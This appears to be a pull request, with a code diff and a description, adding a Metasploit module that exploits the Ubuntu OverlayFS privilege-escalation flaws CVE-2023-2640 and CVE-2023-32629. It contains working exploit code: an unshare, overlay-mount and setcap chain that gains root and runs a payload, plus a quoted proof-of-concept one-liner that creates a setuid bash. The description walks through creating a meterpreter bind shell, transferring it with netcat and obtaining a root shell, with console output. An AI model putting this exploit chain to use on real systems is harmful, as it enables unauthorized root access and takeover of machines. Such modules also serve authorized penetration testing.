-    hack =  "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; 
-    mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\""
-    
+    # Build the command
 
-    print_status "Running exploit:\n'#{hack}'\n"
-    print_status(cmd_exec_with_result(hack).to_s)
+    exploit_cmd = 'unshare -rm sh -c "'
+    exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; "
+    exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; "
+    exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && "
+    exploit_cmd << "touch #{merge_dir}*; \" && "
+    exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system("
+    exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
+    exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD
+    exploit_cmd << "#{bash_copy} -p -c "
+    exploit_cmd << payload_cmd
+    exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD
+    exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'"
 
-    # Trigger payload
-    trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}"
+    vprint_status(exploit_cmd.to_s)
 
-    print_status "Triggering payload: #{trigger}"
-    print_status(cmd_exec_with_result(trigger).to_s)
+    output = cmd_exec(exploit_cmd)
+    print_status(output)
   end
 
 end

--- a/modules/exploits/linux/local/gameoverlay_privesc.rb
+++ b/modules/exploits/linux/local/gameoverlay_privesc.rb
@@ -1,0 +1,164 @@
+class MetasploitModule < Msf::Exploit::Local
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+  include FileUtils
+
+  # TODO 
+  # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions
+  # ^ What does the output change to 
+  #
+  # 4) Make exploit more readable with multiline string, change exploit to use 
+  # todo add python requirement
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GameOver(lay) Privilege Escalation and Container Escape',
+        'Description' => %q{
+          This module exploits the use of unsafe functions in a number of Ubuntu kernels
+          utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux
+          kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent
+          changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is
+          called during ovl_do_setxattr without calling the intermediate safety function
+          vfs_setxattr. Ultimatly this module allows for root access to be achieved by
+          writing setuid capabilities to a file which are not sanitized after being unioned
+          with the upper mounted directory.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'g1vi', # PoC
+          'h00die', # Module Suggestion
+          'gardnerapp', # MsF Module
+        ],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'DisclosureDate' => '2023-07-26',
+        'References' => [
+          ['URL', 'https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/'],
+          ['URL', 'https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629'],
+          ['URL', 'https://www.cvedetails.com/cve/CVE-2023-2640/'],
+          ['URL', 'https://www.cvedetails.com/cve/CVE-2023-32629/'],
+          ['URL', 'https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability'],
+          ['CVE', '2023-32629'],
+          ['CVE', '2023-2640']
+        ],
+        'Targets' => [ [ 'Linux', {} ] ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'CmdStagerFlavor' => 'bourne'
+      )
+    )
+    register_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
+      OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv'])
+    ]
+  end
+
+  def vuln
+    # Keys are ubuntu versions, vals is list of vunerable kernels
+    {
+      "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04
+      "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10
+      "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS
+      "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS
+      "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS
+    }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver"
+  end
+
+  def check
+    return CheckCode::Safe('Target is not linux.') unless session.platform == 'linux'
+
+    # Must be Ubuntu
+    return CheckCode::Safe('Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/
+
+    os = cmd_exec 'cat /etc/os-release'
+
+    # grab codename i.e. Focal Fossa
+    codename = os.scan(/\(\w* \w*\)/)[0]
+
+    # Remove '(' and ')'
+    codename.delete_prefix!('(').delete_suffix!(')')
+
+    print_status "Detected Ubuntu version: #{codename}"
+
+    # uname -r
+    # yields something like 5.4.0-1018-blah
+    kernel = kernel_release
+    print_status "Detected kernel version: #{kernel}"
+
+    # Make sure release is running vunerable kernel
+    # will this return in correct context??
+    # could scan kernel to prevent looping if return below doesn't work
+    vuln[codename].each do |version|
+      if kernel.include? version
+        return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
+      end
+    end
+
+    return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel")
+  end
+
+  def execute_command(_cmd, _opts = {})
+    pay_file = datastore['PayloadFilename']
+
+    pay_dir = datastore['WritableDir']
+    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += Rex::Text.rand_text_alpha 10
+
+    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
+
+    # Should we make sure directory doesn't already exist?
+
+    directories.each do |dir|
+      print_status "Creating directory #{dir}"
+      mkdir dir
+    end
+
+    register_dir_for_cleanup pay_dir
+
+    print_status "Creating directory to store payload: #{pay_dir}"
+    pay_dir.concat "/" unless pay_dir.ends_with? "/"
+    cmd_exec "mkdir -p #{pay_dir}"
+
+    register_dir_for_cleanup pay_dir
+
+    pay = "#{pay_dir}#{pay_file}"
+
+    print_status "Writing payload: #{pay}"
+
+    write_file "#{pay}", generate_payload_exe
+    # works move test to low, run unshare mount set cap, shell
+
+    print_status 'Starting new namespace, and running exploit...'
+
+    # g1vi original
+    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
+    
+    # TODO move running of payload and exploit to different cmd_exec calls
+    # Swap vulns w code names, make sure regexes work agsain,s
+    hack =  <<-TEXT
+    unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir};
+        setcap cap_setuid+eip #{pay_dir}l/python3; 
+        mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m 
+        && touch /tmp/main/m/* 
+      \" 
+     && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")'
+    TEXT
+
+    print_status "Running exploit:\n '#{hack}'\n "
+    print_status "Output of command: #{cmd_exec_with_result(hack)}"
+  end
+
+  def exploit
+    puts "System Info: #{get_sysinfo}"
+    execute_cmdstager
+
+    # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"}
+  end
+
+end


### PR DESCRIPTION
This module was originally suggested by #18765 and builds on [this PoC](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629) from @g1vi.  CVE-2023-2640 and CVE-2023-32629 allow for privilege escalation on Ubuntu systems due to a failure to call `vfs_setxattr` during execution of `ovl_do_setxattr`, this results in the failure to sanitize file capabilities during file system union process. [This article](https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability#what-is-gameoverlay-7) explains the technical details of the vulnerability much better then I can and also provides a convenient list of vulnerable Ubuntu and Kernel versions. 

This exploit was tested on Ubuntu Focal Fossa 20.04.6 with a 5.4.0-1018-aws kernel. I changed the Kernel version by following [this tutorial ](https://www.youtube.com/watch?v=NWddYt3WN80), the google drive doc linked in the video is probably quicker to read. Please note that I used a bind shell to connect to the system, and a bind shell as a payload for the exploit. I am well aware that bind shells are frowned upon IRL because of firewalls, IDS, etc. I only had to use one because I don't have access to a Linux System outside of the cloud. 

## Verification

1, Target System
```
ubuntu@ubuntu ~$ cat /etc/os-release && uname -a
NAME="Ubuntu"VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Linux 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```

2. Creating a bind shell
`msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=5555 -f elf -o bind.elf`

3. Transfer the bind shell
I used netcat 
On remote machine: `nc -lvnp 1234 > bind.elf`
Local machine `cat bind.elf > <REMOTE IPADDRESS> 1234`

4. Execute the bind shell
`chmod +x bind.elf && ./bind.elf`

5. Start msf and connect to bind shell
```
$ msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meteroreter/bind_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:5555
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 1 opened (172.16.227.214:52193 -> 54.158.170.60:5555) at 2024-09-13 09:48:31 -0400

meterpreter > shell
Process 9129 created.
Channel 1 created.
whoami
ubuntu
exit
meterpreter > bg
[*] Backgrounding session 1...
```

6. Running the exploit, I unfortunately also had to use a bind shell for this. 
```
msf6 exploit(multi/handler) > use exploit/linux/local/game_overlay_privesc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set session 1 
session => 1
msf6 exploit(linux/local/game_overlay_privesc) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set lport 6666
lport => 6666
msf6 exploit(linux/local/game_overlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory /tmp/main/l
[*] Creating directory /tmp/main/u
[*] Creating directory /tmp/main/w
[*] Creating directory /tmp/main/m
[*] Creating directory to store payload: /tmp/main/
[*] Writing payload: /tmp/main/marv
[*] Starting new namespace, and running exploit...
[*] Running exploit: 'unshare -rm sh -c "cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system("chmod +x /tmp/main/marv && /tmp/main/marv")' ' 

false
[*] Command Stager progress - 100.00% done (747/747 bytes)
[*] Started bind TCP handler against :6666
[*] Exploit completed, but no session was created.
```

There is now a bind shell running on the system with root level privileges. On the remote system you can verify the listening port with `ss -ano | grep 6666` 

7. Connect to the root bind shell
```
msf6 exploit(linux/local/game_overlay_privesc) > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:6666
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 2 opened (172.16.227.214:52242 -> 54.158.170.60:6666) at 2024-09-13 09:53:31 -0400

meterpreter > shell
Process 9532 created.
Channel 1 created.
whoami
root
```
Here are some Pictures

Open bind port on target: 
![bind_shell](https://github.com/user-attachments/assets/05b5893a-4783-4df0-8313-d78e22e8aaa9)

Process list after payload execution `marv` is meterpreter running as root
![processes](https://github.com/user-attachments/assets/0a137ccc-eadc-4da6-9176-51fb2796a08f)

Exploit
<img width="1417" alt="Screenshot 2024-09-13 at 9 54 15 AM" src="https://github.com/user-attachments/assets/839708e7-9a1f-4de1-b44e-2f3d478473d1">



<img width="1436" alt="Screenshot 2024-09-13 at 9 53 49 AM" src="https://github.com/user-attachments/assets/585df2d7-d266-4789-9ca6-b7f8f2958068">
